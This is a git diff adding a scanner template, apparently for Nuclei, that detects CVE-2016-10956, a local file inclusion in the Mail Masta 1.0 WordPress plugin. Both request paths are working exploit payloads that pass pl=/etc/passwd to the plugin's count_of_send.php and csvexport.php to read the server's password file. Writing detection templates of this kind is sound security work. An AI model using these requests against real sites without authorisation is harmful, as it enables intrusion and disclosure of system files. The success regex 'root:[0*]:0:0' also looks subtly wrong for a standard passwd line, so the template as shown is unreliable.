diff --git a/cves/2016/CVE-2016-10956.yaml b/cves/2016/CVE-2016-10956.yaml
new file mode 100644
index 0000000000..4c48c18707
--- /dev/null
+++ b/cves/2016/CVE-2016-10956.yaml
@@ -0,0 +1,25 @@
+id: CVE-2016-10956
+
+info:
+  name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
+  author: daffainfo
+  severity: high
+  description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
+  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
+  tags: cve,cve2016,wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+      - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[0*]:0:0"
+        part: body
+      - type: status
+        status:
+          - 200